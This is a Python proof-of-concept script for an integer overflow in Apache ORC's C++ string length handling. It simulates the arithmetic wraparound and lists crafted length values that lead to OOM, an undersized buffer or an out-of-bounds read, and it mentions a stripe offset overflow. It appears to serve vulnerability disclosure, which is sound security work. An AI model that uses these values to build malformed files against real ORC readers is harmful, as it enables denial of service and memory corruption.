#!/usr/bin/env python3 """ PoC: Apache ORC String Length Integer Overflow =============================================== Root cause: ColumnReader.cc:697 totalLength += static_cast(lengths[i]); // lengths[i] is int64_t from unsigned RLE decoder — NO negative check String lengths decoded by unsigned RLE (isSigned=false, line 645) are stored as int64_t. Values >= 2^63 become negative. static_cast on negative int64_t produces huge size_t → OOM or wrap-to-zero. """ import struct def show_overflow(): print("ORC StringDirectColumnReader::computeSize() Integer Overflow") print("=" * 60) print() print("Vulnerable code (ColumnReader.cc:691-706):") print(" size_t totalLength = 0;") print(" for (i = 0; i < numValues; ++i)") print(" totalLength += static_cast(lengths[i]); // NO CHECK!") print() print("How negative lengths occur:") print(" 1. RLE decoder is unsigned (isSigned=false, line 645)") print(" 2. Output stored in int64_t* (line 715-718)") print(" 3. uint64 values >= 2^63 become negative int64_t") print(" 4. static_cast(negative) = huge positive") print() test_cases = [ ("OOM DoS: single huge length", [2**63]), ("Wrap to 0: two lengths", [2**64 - 1, 1]), ("Wrap to 1: crafted pair", [2**64 - 100, 101]), ] for desc, uint_lengths in test_cases: print(f"Case: {desc}") total = 0 for ul in uint_lengths: as_int64 = struct.unpack('q', struct.pack('Q', ul % (2**64)))[0] as_size_t = ul % (2**64) total = (total + as_size_t) % (2**64) print(f" RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}") print(f" totalLength = {total} ({total:#018x})") if total == 0: print(" -> blob.resize(0) -> EMPTY BLOB") print(" -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read") elif total < 1000: print(f" -> blob.resize({total}) -> UNDERSIZED BUFFER") print(" -> actual data > blob size -> HEAP CORRUPTION") elif total > 2**40: print(f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH") print() print("Additional: Stripe offset overflow (Reader.cc:591)") print(" stripeFooterStart = offset + index_length + data_length") print(" All uint64 from protobuf, no overflow check") print(" -> wraps around -> reads wrong file location") print() print("ORC C++ has ZERO safe arithmetic in core parsing code") print(" Reader.cc: 0 overflow checks in 1830 lines") print(" ColumnReader.cc: 0 overflow checks in 1793 lines") if __name__ == "__main__": show_overflow()